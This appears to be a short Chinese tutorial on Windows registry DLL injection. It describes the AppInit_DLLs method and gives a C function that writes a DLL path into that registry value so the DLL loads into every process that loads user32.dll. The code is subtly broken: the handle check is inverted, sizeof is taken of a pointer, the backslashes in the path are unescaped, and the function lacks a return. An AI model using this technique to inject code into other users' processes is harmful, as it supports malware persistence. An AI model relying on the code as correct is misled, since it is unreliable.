1.简介
最简单的注入, 注册表注入, 容易被发现,会被注入到所有加载user32.dll的进程中
2.代码
#define tarKey L"SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows" DWORD regInject(WCHAR* dllpath) { HKEY hKey=0; RegOpenKeyExW(HKEY_LOCAL_MACHINE, tarKey, 0, KEY_ALL_ACCESS, &hKey); if (hKey!=0) { return 0; } RegSetValueExW(hKey, L"AppInit_DLLS", 0, REG_MULTI_SZ, (BYTE*)dllpath, sizeof(dllpath)); } //end 注册表注入